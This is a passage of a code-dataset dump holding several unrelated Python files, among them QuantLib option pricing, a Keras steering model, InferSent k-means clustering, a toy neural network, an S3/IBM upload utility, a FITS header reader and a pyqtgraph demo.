option.NPV())\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"CRR\", timeSteps))\r\nreport(\"binomial (CRR)\", option.NPV())\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"EQP\", timeSteps))\r\nreport(\"binomial (EQP)\", option.NPV())\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"Trigeorgis\", timeSteps))\r\nreport(\"bin. (Trigeorgis)\", option.NPV())\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"Tian\", timeSteps))\r\nreport(\"binomial (Tian)\", option.NPV())\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"LR\", timeSteps))\r\nreport(\"binomial (LR)\", option.NPV())\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"Joshi4\", timeSteps))\r\nreport(\"binomial (Joshi)\", option.NPV())\r\n\r\n# method: finite differences\r\n# not yet implemented\r\n\r\n# method: Monte Carlo\r\noption.setPricingEngine(ql.MCEuropeanEngine(process, \"pseudorandom\", timeSteps=1, requiredTolerance=0.02, seed=42))\r\nreport(\"MC (crude)\", option.NPV(), option.errorEstimate())\r\n\r\noption.setPricingEngine(ql.MCEuropeanEngine(process, \"lowdiscrepancy\", timeSteps=1, requiredSamples=32768))\r\nreport(\"MC (Sobol)\", option.NPV())\r\n","sub_path":"European Option - QuantLib.py","file_name":"European Option - QuantLib.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"313088137","text":"import csv\r\nimport cv2\r\nimport math\r\nimport numpy as np\r\nfrom PIL import Image \r\nimport matplotlib.pyplot as plt\r\nfrom os import getcwd\r\n\r\n\r\nfrom sklearn.utils import shuffle\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\nfrom keras.models import Sequential, model_from_json\r\nfrom keras.layers import Flatten, Dense, Lambda, Dropout, Activation\r\nfrom keras.layers import Convolution2D, MaxPooling2D, Cropping2D\r\nfrom keras.regularizers import l2, activity_l2\r\nfrom keras.optimizers import Adam\r\nfrom keras.callbacks import ModelCheckpoint, Callback\r\n\r\nimport tensorflow as tf\r\ntf.python.control_flow_ops = tf\r\n\r\nfrom keras import models, optimizers, backend\r\nfrom keras.layers import core, convolutional, pooling\r\nfrom sklearn import model_selection\r\n\r\n\r\ndef preprocessing_image(img):\r\n \r\n new_img = cv2.GaussianBlur(img, (3,3), 0)\r\n\r\n new_img = cv2.cvtColor(new_img, cv2.COLOR_BGR2RGB)\r\n return new_img\r\n\r\ndef random_distort(img, angle):\r\n ''' \r\n random distortion to dataset images\r\n '''\r\n new_img = img.astype(float)\r\n # random brightness \r\n value = np.random.randint(-28, 28)\r\n if value > 0:\r\n mask = (new_img[:,:,0] + value) > 255 \r\n if value <= 0:\r\n mask = (new_img[:,:,0] + value) < 0\r\n new_img[:,:,0] += np.where(mask, 0, value)\r\n # random shadow \r\n h,w = new_img.shape[0:2]\r\n mid = np.random.randint(0,w)\r\n factor = np.random.uniform(0.6,0.8)\r\n if np.random.rand() > .5:\r\n new_img[:,0:mid,0] *= factor\r\n else:\r\n new_img[:,mid:w,0] *= factor\r\n # randomly shift horizon\r\n h,w,_ = new_img.shape\r\n horizon = 2*h/5\r\n v_shift = np.random.randint(-h/8,h/8)\r\n pts1 = np.float32([[0,horizon],[w,horizon],[0,h],[w,h]])\r\n pts2 = np.float32([[0,horizon+v_shift],[w,horizon+v_shift],[0,h],[w,h]])\r\n M = cv2.getPerspectiveTransform(pts1,pts2)\r\n new_img = cv2.warpPerspective(new_img,M,(w,h), borderMode=cv2.BORDER_REPLICATE)\r\n return (new_img.astype(np.uint8), angle)\t\r\n\t\r\n\r\ndef generate_training_data(images, angles, batch_size=128, validation_flag=False):\r\n '''\r\n method for the model training data generator to process, distort, and load images, in order to feed the model. \r\n '''\r\n images, angles = shuffle(images, angles)\r\n X,y = ([],[])\r\n while True: \r\n for i in range(len(angles)):\r\n img = images[i] \t\t\t\r\n angle = angles[i]\r\n img = preprocessing_image(img)\r\n if not validation_flag:\r\n img, angle = random_distort(img, angle)\r\n X.append(img)\r\n y.append(angle)\r\n if len(X) == batch_size:\r\n yield (np.array(X), np.array(y))\r\n X, y = ([],[])\r\n images, angles = shuffle(images, angles)\r\n # flipping, if steering angle is higher than 0.3\r\n if abs(angle) > 0.3:\r\n img = cv2.flip(img, 1)\r\n angle *= -1\r\n X.append(img)\r\n y.append(angle)\r\n if len(X) == batch_size:\r\n yield (np.array(X), np.array(y))\r\n X, y = ([],[])\r\n images, angles = shuffle(images, angles)\r\n\r\n\t\t\t\t\t\r\n\r\n\t\t\t\t\t\r\nlines = []\r\nwith open('./data/driving_log.csv') as csvfile: \r\n reader = csv.reader(csvfile)\r\n for line in reader:\r\n lines.append(line)\r\n \r\n \r\n \r\nimages = []\r\nmeasurements = []\r\nfor line in lines:\r\n source_path = line[0] \r\n filename = source_path.split('/')[-1]\r\n current_path = './data/IMG/' + filename\r\n image = cv2.imread(current_path) \r\n images.append(image) \r\n measurement = float(line[3])\r\n measurements.append(measurement)\r\n \r\nX_train = np.array(images)\r\ny_train = np.array(measurements) \r\n\r\n# split into train/test sets\r\nimage_train, image_test, angles_train, angles_test = train_test_split(X_train, y_train, test_size=0.05, random_state=43) \r\n\r\nprint('Train set:', image_train.shape, angles_train.shape)\r\nprint('Test set:', image_test.shape, angles_test.shape)\r\n\r\n###### ConvNet Structure ######\r\n\r\nmodel = Sequential()\r\n\r\n# Normalize\r\nmodel.add(Lambda(lambda x: x / 255.0 - 0.5, input_shape = (160,320,3)))\r\n\r\n# Cropping images\r\nmodel.add(Cropping2D(cropping=((70,25), (60,60))))\r\n\r\n# Add three 5x5 convolution layers (output depth 24, 36, and 48), each with 2x2 stride\r\nmodel.add(Convolution2D(24, 5, 5, subsample = (2,2), activation = \"relu\"))\r\nmodel.add(Convolution2D(36, 5, 5, subsample = (2,2), activation = \"relu\"))\r\nmodel.add(Convolution2D(48, 5, 5, subsample = (2,2), activation = \"relu\"))\r\n\r\n\r\n# Add two 3x3 convolution layers (output depth 64, and 64)\r\nmodel.add(Convolution2D(64, 3, 3, activation = \"relu\"))\r\nmodel.add(Convolution2D(64, 3, 3, activation = \"relu\"))\r\n\r\n# Add a flatten layer\r\nmodel.add(Flatten())\r\n\r\n# Add three fully connected layers (depth 100, 50, 10) and regularizations\r\nmodel.add(Dense(100, W_regularizer=l2(0.00001)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dense(50, W_regularizer=l2(0.00001)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dense(10, W_regularizer=l2(0.00001)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dense(1, W_regularizer=l2(0.00001)))\r\n\r\nmodel.compile(loss = 'mse', optimizer =optimizers.Adam(lr=1e-04))\r\n\r\n# Generators\r\ntrain_gen = generate_training_data(image_train, angles_train, validation_flag=False, batch_size=64)\r\nval_gen = generate_training_data(image_train, angles_train, validation_flag=True, batch_size=64)\r\n#test_gen = generate_training_data(image_test, angles_test, validation_flag=True, batch_size=64)\r\n\r\ncheckpoint = ModelCheckpoint('model{epoch:02d}.h5')\r\n\r\nhistory = model.fit_generator(train_gen, validation_data=val_gen, nb_val_samples=2560, samples_per_epoch=23040, nb_epoch=20, verbose=2, callbacks=[checkpoint])\r\n\r\n\r\nmodel.save('model.h5')\r\n\r\nexit()\r\n","sub_path":"Udacity/1st Term/Behavioral Cloning Project/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347631334","text":"import numpy as np\nimport csv\nimport os\nfrom sklearn.cluster import KMeans\nfrom utils import load_infersent, load_csv_corpus, infersent_encode_sents, dump_feat\nimport torch\nfrom config import cfg\nfrom sklearn.metrics import normalized_mutual_info_score\nfrom sklearn.metrics import adjusted_mutual_info_score\n\n\ndef cluster_acc(y_true, y_pred):\n \"\"\"\n Calculate clustering accuracy. Require scikit-learn installed\n\n # Arguments\n y: true labels, numpy.array with shape `(n_samples,)`\n y_pred: predicted labels, numpy.array with shape `(n_samples,)`\n\n # Return\n accuracy, in [0,1]\n \"\"\"\n y_true = y_true.astype(np.int64)\n y_pred = y_pred.astype(np.int64)\n assert y_pred.size == y_true.size, 'y_pred.size {} y_true.size {}'.format(y_pred.size, y_true.size)\n D = max(y_pred.max(), y_true.max()) + 1\n w = np.zeros((D, D), dtype=np.int64)\n for i in range(y_pred.size):\n w[y_pred[i], y_true[i]] += 1\n from sklearn.utils.linear_assignment_ import linear_assignment\n ind = linear_assignment(w.max() - w)\n return sum([w[i, j] for i, j in ind]) * 1.0 / y_pred.size\n\n\ndef get_feat(infersent, data_path, verbose=True, layer_norm=False, split_sents=True):\n if verbose:\n print('Loading Text Data from {}'.format(data_path))\n train_data, train_labels, ids = load_csv_corpus(data_path)\n if verbose:\n print('Building Vocabulary Table for Infersent by {}'.format(data_path))\n infersent.build_vocab(train_data, tokenize=False)\n if verbose:\n print('Extracting Feat using Infersent')\n train_feat = infersent_encode_sents(infersent, train_data, split_sents=split_sents, layer_norm=layer_norm, verbose=False)\n return train_feat, np.array(train_labels), ids\n\n\ndef cluster_alg(feat, n_clusters, n_jobs=3):\n kmeans = KMeans(n_clusters=n_clusters, n_init=10, n_jobs=n_jobs, verbose=True)\n pred = kmeans.fit_predict(feat)\n return pred\n\ndef ln(feat):\n return (feat - feat.mean(axis=1, keepdims=True)) / feat.std(axis=1, keepdims=True)\n\ndef norm(feat):\n return feat / np.linalg.norm(feat, axis=1, keepdims=True)\n\ndef dump_mongo(corpora, feat_name, n_topics, acc, pred, all_pred, all_acc, all_nmi, all_ari):\n from pymongo import MongoClient\n client = MongoClient('59.72.109.90', 27017)\n cluster_db = client.cluster_db\n results = cluster_db.ub_results\n acc_std = np.std(all_acc)\n acc_mean = np.mean(all_acc)\n nmi_std = np.std(all_nmi)\n nmi_mean = np.mean(all_nmi)\n ari_std = np.std(all_ari)\n ari_mean = np.mean(all_ari)\n best_nmi = np.max(all_nmi)\n best_ari = np.max(all_ari)\n tmp = {\n 'corpora': corpora,\n 'feat_name': feat_name,\n 'n_topics': n_topics,\n 'best_pred': pred,\n 'best_acc': acc,\n 'best_nmi':best_nmi,\n 'best_ari':best_ari,\n 'all_pred': all_pred,\n 'all_acc': all_acc,\n 'acc_std':acc_std,\n 'acc_mean':acc_mean,\n 'all_nmi':all_nmi,\n 'nmi_std':nmi_std,\n 'nmi_mean':nmi_mean,\n 'all_ari':all_ari,\n 'ari_std':ari_std,\n 'ari_mean':ari_mean}\n results.insert_one(tmp)\n client.close()\n\nfeat_func_dict = {'ln': ln, 'n': norm, 'i': lambda x: x}\ndata_dict = {0:'ag_news',1:'dbpedia', 2:'yahoo_answers'}\nn_cluster_dict = {0: 4, 1: 14, 2: 10}\n\nif __name__ == '__main__':\n def get_args():\n import argparse\n parser = argparse.ArgumentParser(description='ElMo')\n parser.add_argument('--corpora_id', type=int, default=0, help='corpora id')\n parser.add_argument('--batch_size', type=int, default=16, help='batch_size')\n args = parser.parse_args()\n return args\n args = get_args()\n assert 0 <= args.corpora_id <= 2\n corpora_name = data_dict[args.corpora_id]\n n_clusters = n_cluster_dict[args.corpora_id]\n train_path = os.path.join('data', corpora_name, 'ub_train.csv')\n #\n print('Loading Pretrained Infersent Model')\n infersent = load_infersent(cfg.INFERSENT_PATH, return_adaptor=True, use_cuda=torch.cuda.is_available())\n infersent.set_glove_path(cfg.GLOVE_PATH)\n #\n \n train_feat, train_labels, train_ids = get_feat(infersent, train_path, verbose=True)\n\n #\n trial_num = 10\n #\n\n feat = train_feat\n labels = train_labels\n feat_name='Infersent'\n for func_name, feat_trans_func in feat_func_dict.items():\n best_acc = 0.0\n best_pred = None\n feat_tmp = feat_trans_func(feat)\n all_pred = []\n all_acc = []\n all_nmi = []\n all_ari = []\n for i in range(trial_num):\n pred = cluster_alg(feat_tmp, n_clusters)\n acc = cluster_acc(labels, pred)\n nmi = normalized_mutual_info_score(labels, pred)\n ari = adjusted_mutual_info_score(labels, pred)\n all_pred.append(pred.tolist())\n all_acc.append(acc)\n all_nmi.append(nmi)\n all_ari.append(ari)\n if acc > best_acc:\n best_pred = pred\n best_acc = acc\n tmp_feat_name = feat_name + '_{}'.format(func_name)\n print('{} {} best acc is {}'.format(tmp_feat_name, func_name, best_acc))\n pred_std = np.std(all_acc)\n pred_mean = np.mean(all_acc)\n dump_mongo(corpora=corpora_name, \n feat_name=tmp_feat_name, \n n_topics=n_clusters, \n acc=best_acc, \n pred=best_pred.tolist(), \n all_pred=all_pred, \n all_acc=all_acc, \n all_nmi=all_nmi, \n all_ari=all_ari)\n","sub_path":"ub_kmeans_infersent.py","file_name":"ub_kmeans_infersent.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"272226455","text":"'''\r\n* Full NeuralNetwork.py program\r\n\r\n* Author: Mick Perring\r\n* Date: October 2018\r\n\r\n* Adapted from code by Michael A. Nielsen in his online book:\r\n* Neural Networks and Deep Learning\r\n* M. Nielsen, Neural Networks and Deep Learning. Determination Press, 2015\r\n* http://neuralnetworksanddeeplearning.com/\r\n\r\n* This program creates a basic two-layer neural network that performs\r\n* a simple three-input XOR function. Datasets must be in .csv format\r\n* and consist of three columns of binary values and a forth column that\r\n* is the XOR of the three values in the three input columns\r\n'''\r\n\r\nimport numpy as np\r\n\r\n# sigmoid activation function\r\ndef sigmoid(x):\r\n\treturn 1.0/(1 + np.exp(-x))\r\n\r\n# derivative of the sigmoid activation function\r\ndef sigmoid_prime(x):\r\n\treturn sigmoid(x)*(1 - sigmoid(x))\r\n\r\n# creates an identity vector of the desired output\r\ndef vector(j):\r\n\te = np.zeros((2, 1))\r\n\te[j] = 1.0\r\n\treturn e\r\n\r\n# loads input dataset and test dataset, and reshapes them\r\ndef data_loader(d_file, t_file=None):\r\n\r\n\tdataset = np.loadtxt(d_file, dtype=int, delimiter=\";\")\r\n\tx = dataset[:,0:3]\r\n\ty = dataset[:,3]\r\n\r\n\ttd = (x, y)\r\n\tin_data = [np.reshape(i, (3, 1)) for i in td[0]]\r\n\tout_data = [vector(j) for j in td[1]]\r\n\r\n\tdata = zip(in_data, out_data)\r\n\r\n\tif t_file:\t\r\n\t\ttestset = np.loadtxt(t_file, dtype=int, delimiter=\";\")\r\n\t\tf = testset[:,0:3]\r\n\t\tg = testset[:,3]\r\n\r\n\t\tts = (f, g)\r\n\t\tin_test = [np.reshape(i, (3, 1)) for i in ts[0]]\r\n\r\n\t\ttest = zip(in_test, ts[1])\r\n\r\n\t\treturn(data, test)\r\n\r\n\telse: return(data)\r\n\r\n'''\r\n* This is the main class of the program. It creates a NeuralNet object instance when\r\n* called and initialises the NN’s weights and biases arrays in the __init__ block.\r\n* It has a number of methods within the class pertaining to the training of the NN\r\n'''\r\nclass NeuralNet(object):\r\n\r\n\tdef __init__(self, i, l, o):\r\n\r\n\t\tself.sizes = [i, l, o]\r\n\t\tself.layers = len(self.sizes)\r\n\t\tself.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]\r\n\t\tself.weights = [np.random.randn(y, x) for x, y in zip(self.sizes[:-1], self.sizes[1:])]\r\n\r\n\t'''\r\n\t* Performs the feedforward algorithm during testing and prediction in the NeuralNet.\r\n\t* Returns the activation value a.\r\n\t'''\r\n\tdef forwardprop(self, a):\r\n\r\n\t\tfor b, w in zip(self.biases, self.weights):\r\n\t\t\ta = sigmoid(np.dot(w, a) + b)\r\n\r\n\t\treturn a\r\n\r\n\t'''\r\n\t* This method runs most of the program. It trains the network on the input data using\r\n\t* Stochastic Gradient Descent (SGD). It will print out progress to the console, and\r\n\t* if test data is provided, then it will also print out performance metrics for each\r\n\t* training epoch.\r\n\t'''\r\n\tdef train(self, data, epochs, batch, rate, tst=None):\r\n\t\t\r\n\t\tn = len(data)\r\n\r\n\t\tif tst:\r\n\t\t\tn2 = len(tst)\r\n\r\n\t\tfor i in range(epochs):\r\n\t\t\tbatches = [data[j:j+batch] for j in range(0, n, batch)]\r\n\r\n\t\t\tfor x in batches:\r\n\t\t\t\tb_prime = [np.zeros(b.shape) for b in self.biases]\r\n\t\t\t\tw_prime = [np.zeros(w.shape) for w in self.weights]\r\n\r\n\t\t\t\tfor u, v in x:\r\n\t\t\t\t\tdb_p, dw_p = self.backprop(u, v)\r\n\r\n\t\t\t\t\tb_prime = [db+bx for db, bx in zip(b_prime, db_p)]\r\n\t\t\t\t\tw_prime = [dw+wx for dw, wx in zip(w_prime, dw_p)]\r\n\r\n\t\t\t\tself.weights = [w-(rate/len(x))*dw for w, dw in zip(self.weights, w_prime)]\r\n\t\t\t\tself.biases = [b-(rate/len(x))*db for b, db in zip(self.biases, b_prime)]\r\n\r\n\t\t\t\tcorrect = self.eval(tst)\r\n\r\n\t\t\tif tst:\r\n\t\t\t\tprint(\"Epoch{:4d}:{:5d}/{} correct | Accuracy: {:5.2f}%\".format(i+1, correct, n2, (correct/n2)*100.0))\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Epoch {0}/{1} complete\".format(i+1, epochs))\r\n\r\n\t'''\r\n\t* Performs all the backpropagation operations on the NeuralNet during training.\r\n\t* Returns the derivative matrices for the biases and weights, which represent\r\n\t* the gradient for the cost function.\r\n\t'''\r\n\tdef backprop(self, x, y):\r\n\t\t\r\n\t\tb_prime = [np.zeros(b.shape) for b in self.biases]\r\n\t\tw_prime = [np.zeros(w.shape) for w in self.weights]\r\n\t\t\r\n\t\ta = x\r\n\t\tactivations = [x] # list to store all the activations, layer by layer\r\n\t\tz_vectors = [] # list to store all the z vectors, layer by layer\r\n\r\n\t\tfor b, w in zip(self.biases, self.weights):\r\n\t\t\tz = np.dot(w, a)+b\r\n\t\t\tz_vectors.append(z)\r\n\t\t\ta = sigmoid(z)\r\n\t\t\tactivations.append(a)\r\n\r\n\t\t# backward pass\r\n\t\tdelta = self.cost(activations[-1], y) * sigmoid_prime(z_vectors[-1])\r\n\t\tb_prime[-1] = delta\r\n\t\tw_prime[-1] = np.dot(delta, activations[-2].T)\r\n\r\n\t\tfor l in range(2, self.layers):\r\n\t\t\tz = z_vectors[-l]\r\n\t\t\tsp = sigmoid_prime(z)\r\n\t\t\tdelta = np.dot(self.weights[-l+1].T, delta) * sp\r\n\t\t\tb_prime[-l] = delta\r\n\t\t\tw_prime[-l] = np.dot(delta, activations[-l-1].T)\r\n\t\treturn (b_prime, w_prime)\r\n\r\n\t# Returns to partial derivative vector of the cost function and the activation a.\r\n\tdef cost(self, x, y):\r\n\t\treturn(x-y)\r\n\r\n\t# This method evaluates the network performance by returning the number of test\r\n\t# inputs that were correctly predicted in testing.\r\n\tdef eval(self, tst):\r\n\t\tresults = [(np.argmax(self.forwardprop(x)), y) for (x, y) in tst]\r\n\r\n\t\treturn sum(int(x == y) for (x, y) in results)\r\n\r\n# called when the program is run\r\nif __name__ == \"__main__\":\r\n\r\n\t# User input\r\n\ttrn_data = input(\"\\nEnter the training data filename: \")\r\n\ttst_data = input(\"Enter the test data filename (if none, just press enter): \")\r\n\tepochs = int(input(\"Enter the number of training epochs: \"))\r\n\tbatch_size = int(input(\"Enter the batch size: \"))\r\n\tlearn_rate = float(input(\"Enter the learning rate (between 1.0 - 3.0): \"))\r\n\r\n\tif tst_data:\r\n\t\tdata, test = data_loader(trn_data, t_file=tst_data)\r\n\t\ttest = list(test)\r\n\telse:\r\n\t\tdata = data_loader(trn_data, t_file=None)\r\n\r\n\tdata = list(data)\r\n\r\n\tnet = NeuralNet(3, 4, 2)\r\n\r\n\tprint()\r\n\r\n\tif tst_data:\r\n\t\tnet.train(data, epochs, batch_size, learn_rate, tst=test)\r\n\telse: \r\n\t\tnet.train(data, epochs, batch_size, learn_rate, tst=None)\r\n","sub_path":"Neural_Net/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"175031915","text":"import subprocess\nfrom os.path import join\nfrom subprocess import call\n\nimport boto3\n\nfrom faasmcli.util.env import AWS_REGION\n\n_s3 = None\n\n\ndef _get_s3():\n global _s3\n if _s3 is None:\n _s3 = boto3.resource(\"s3\", region_name=AWS_REGION)\n\n return _s3\n\n\ndef upload_file_to_s3(file_path, s3_bucket, s3_key, public=False):\n s3 = _get_s3()\n kwargs = {\"ExtraArgs\": {\"ACL\": \"public-read\"}} if public else {}\n s3.Bucket(s3_bucket).upload_file(file_path, s3_key, **kwargs)\n\n\ndef upload_file_to_ibm(file_path, bucket_name, key):\n cmd = [\n \"ibmcloud\", \"cos\", \"put-object\",\n \"--bucket\", bucket_name,\n \"--key\", key,\n \"--body\", file_path,\n ]\n\n call(\" \".join(cmd), shell=True)\n\n\ndef list_files_s3(s3_bucket, prefix):\n s3 = _get_s3()\n b = s3.Bucket(s3_bucket)\n\n key_strings = []\n for k in b.objects.filter(Prefix=prefix):\n key_strings.append(k.key)\n\n return key_strings\n\n\ndef download_file_from_s3(s3_bucket, s3_key, file_path, boto=True):\n if boto:\n print(\"Downloading file using boto - {}\".format(file_path))\n s3 = _get_s3()\n s3.Bucket(s3_bucket).download_file(s3_key, file_path)\n else:\n url = \"https://s3-{}.amazonaws.com/{}/{}\".format(AWS_REGION, s3_bucket, s3_key)\n cmd = \"wget -q {} -O {}\".format(url, file_path)\n print(cmd)\n subprocess.check_output(cmd, shell=True)\n\n\ndef download_tar_from_s3(s3_bucket, tar_name, tar_dir, boto=True):\n tar_path = join(tar_dir, tar_name)\n download_file_from_s3(s3_bucket, tar_name, tar_path, boto=boto)\n\n print(\"Extracting file {} (at {})\".format(tar_name, tar_dir))\n subprocess.check_output(\"tar --no-same-owner -xf {}\".format(tar_name), shell=True, cwd=tar_dir)\n\n\ndef download_tar_from_url(url, tar_name, tar_dir):\n tar_path = join(tar_dir, tar_name)\n\n cmd = \"wget -q {} -O {}\".format(url, tar_path)\n print(cmd)\n subprocess.check_output(cmd, shell=True)\n\n print(\"Extracting file {} (at {})\".format(tar_name, tar_dir))\n subprocess.check_output(\"tar --no-same-owner -xf {}\".format(tar_name), shell=True, cwd=tar_dir)\n\n\ndef copy_object_in_s3(s3_bucket, src_key, dest_key, public=False):\n s3 = _get_s3()\n kwargs = {\"ACL\": \"public-read\"} if public else {}\n s3.Object(s3_bucket, dest_key).copy_from(\n CopySource=\"{}/{}\".format(s3_bucket, src_key),\n **kwargs\n )\n\n\ndef curl_file(url, file_path, headers=None):\n cmd = [\n \"curl\",\n \"-X\", \"PUT\",\n url,\n \"-T\", file_path\n ]\n\n headers = headers if headers else {}\n for key, value in headers.items():\n cmd.append(\"-H \\\"{}: {}\\\"\".format(key, value))\n\n cmd = \" \".join(cmd)\n print(cmd)\n res = subprocess.call(cmd, shell=True)\n\n if res == 0:\n print(\"Successfully PUT file {} to {}\".format(file_path, url))\n else:\n raise RuntimeError(\"Failed PUTting file {} to {}\".format(file_path, url))\n","sub_path":"faasmcli/faasmcli/util/upload_util.py","file_name":"upload_util.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"435032878","text":"#!/usr/bin/env/ python\n\"\"\"\nvoid_reducer 0.1\n\nPrints header data from a FITS filenames from stdin.\n\nUsage:\n void_reducer [--verbosity=V]\n void_reducer -v | --version\n void_reducer -h | --help\n\nOptions:\n -h --help Show this help screen\n -v --version Show program name and version number\n -V --verbosity=V Logging verbosity, 0 to 4 [default: 2]\n\"\"\"\n\nimport json\nimport logging\nimport sys\n\nimport docopt\nfrom astropy.io import fits\n\nfrom void import common, config\n\nlog = logging.getLogger(__name__)\n\n\ndef print_header_data(fits_fname):\n \"\"\"\n Prints header data from a certain FITS file as a JSON dictionary.\n \"\"\"\n log.debug('printing data for %s', fits_fname)\n\n with fits.open(fits_fname) as hdul:\n header_dict = hdul[0].header\n\n date_obs = header_dict['DATE-OBS']\n exp = header_dict['EXPTIME']\n focus = header_dict['FOCUSPOS']\n ra_center = header_dict['OBJCTRA']\n dec_center = header_dict['OBJCTDEC']\n\n x_pix_size = header_dict['NAXIS1']\n y_pix_size = header_dict['NAXIS2']\n x_binning = header_dict['XBINNING']\n y_binning = header_dict['YBINNING']\n\n x_scale = config.SCALE_X_BIN1\n y_scale = config.SCALE_Y_BIN1\n\n x_deg_size = float(x_pix_size * x_binning * x_scale) / 3600\n y_deg_size = float(y_pix_size * y_binning * y_scale) / 3600\n\n return_dict = {\n 'date_obs': date_obs,\n 'exposition': exp,\n 'focus': focus,\n 'ra_center': ra_center,\n 'dec_center': dec_center,\n 'x_deg_size': x_deg_size,\n 'y_deg_size': y_deg_size,\n }\n\n json_dict = json.dumps(return_dict)\n sys.stdout.write(f'{json_dict}\\n')\n\n\ndef main():\n name_and_version = __doc__.strip().splitlines()[0]\n arguments = docopt.docopt(__doc__, help=True, version=name_and_version)\n common.configure_log(arguments['--verbosity'])\n log.debug('initialising')\n\n fnames_arr = []\n\n for line in sys.stdin:\n fnames_arr.append(line.strip())\n\n for fname in fnames_arr:\n print_header_data(fname)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"void/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"213936135","text":"# Nicholas Anway\n# Reference http://strftime.org/ for the format string codes\n\nfrom datetime import datetime\n\nraw_date = \"2017-01-11\"\ndate_format = \"%Y-%m-%d\"\n\n# take the string object type and read into python datetime format\nparsed_date = datetime.strptime(raw_date, date_format)\n\n# or...\nparsed_date = datetime.strptime(raw_date, \"%Y-%m-%d\")\n\n# convert parsed date to a string in a given format\ndate_str = parsed_date.strftime(\"%m/%d/%y\")\n\nprint(raw_date)\nprint(parsed_date)\nprint(date_str)\n","sub_path":"datetime-example.py","file_name":"datetime-example.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"385169590","text":"import sys\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport numpy as np\nimport pyqtgraph as pg\nimport random\n\nclass TestClass(QtGui.QMainWindow):\n #####################################################\n def __init__(self):\n super(TestClass, self).__init__()\n self.initUI()\n ####################################################\n # GUI construction\n def initUI(self):\n self.setWindowTitle(\"Mouse Point, x & y\")\n win = QtGui.QWidget()\n # creates plot\n self.plot = pg.PlotWidget()\n self.plot.setLabel('left', \"B\", units='T')\n self.plot.setLabel('bottom', \"t\", units='s')\n self.plot.showGrid(x=1, y=1, alpha=None)\n self.setCentralWidget(win)\n self.setGeometry(600, 600, 600, 600)\n self.setWindowTitle('Mouse Point, x& y GUI')\n\n # Create some widgets to be placed inside\n btnRandon = QtGui.QPushButton('Random Function')\n # Create a grid layout to manage the widgets size and position\n layout = QtGui.QGridLayout(win)\n\n # Add widgets to the layout in their proper positions\n layout.addWidget(btnRandon, 0, 0) # button to show or hide the OldB\n layout.addWidget(self.plot, 1, 0)\n\n mypen = pg.mkPen('y', width=1)\n self.curve = self.plot.plot(x=[], y=[], pen=mypen)\n\n # Plot\n self.t_plot_max = 30\n self.fe = 10e3\n self.t = np.arange(-1 * self.t_plot_max, 0, 1.0 / self.fe)\n self.len_signal = len(self.t)\n self.signal = np.zeros(self.len_signal, dtype=np.double)\n\n btnRandon.clicked.connect(self.buttonRandomClicked)\n self.curve.scene().sigMouseMoved.connect(self.onMouseMoved)\n\n def onMouseMoved(self, point):\n p = self.plot.plotItem.vb.mapSceneToView(point)\n self.statusBar().showMessage(\"{}-{}\".format(p.x(), p.y()))\n\n def buttonRandomClicked(self):\n print (\"Show/Hide OldB\")\n self.signal = np.random.rand(20)\n self.curve.setData(self.signal)\n\n\n# MAIN ##################################################\ndef main():\n app = QtGui.QApplication(sys.argv)\n ex = TestClass()\n ex.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"PyQt/Useful/PyqtgraphCoordinate.py","file_name":"PyqtgraphCoordinate.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"383229727","text":"from bs4 import BeautifulSoup#Beautifulsoup is an HTML parser that will make parsing the schedule easier\nfrom Course import Course\nfrom CourseSegment import CourseSegment\nfrom TimeBlock import TimeBlock\n\nclass MacCourseLoader():\n\thtml_file_name=\"Timetable.htm\" #redundant, UniSchedule.py assigns same value\n\toutput_file_name=\"stripped.txt\" #redundant, UniSchedule.py assigns same value\n\tstripped_file=None\n\tcurrent_dept=None\n\tpeeked_line=False\n\tline_no=0\n\n\tdef preload(self):\n\t\t#Try to open file\n\t\t#if it does not exist yet\n\t\t#make it, prep to read\n\t\ttry:\n\t\t\tself.stripped_file=open(self.output_file_name, 'r')\n\t\texcept:\n\t\t\tself.make_text(self.html_file_name,self.output_file_name)\n\t\t\tself.stripped_file=open(self.output_file_name, 'r')\n\n\t\tfor i in range(0,2):#there are 10 lines before the first department\n\t\t\tself.read_line()\n\n\n\tdef make_text(self,html_file_name,output_file_name):\n\t\t#Open HTML\n\t\t#Scrape it with beautiful soup\n\t\t#write out to a file\n\t\tself.html_file_name=html_file_name\n\t\tself.output_file_name=output_file_name\n\n\t\twith open (self.html_file_name, \"r\") as myfile:\n\t\t\thtml_doc=myfile.read()\n\t\t\tsoup = 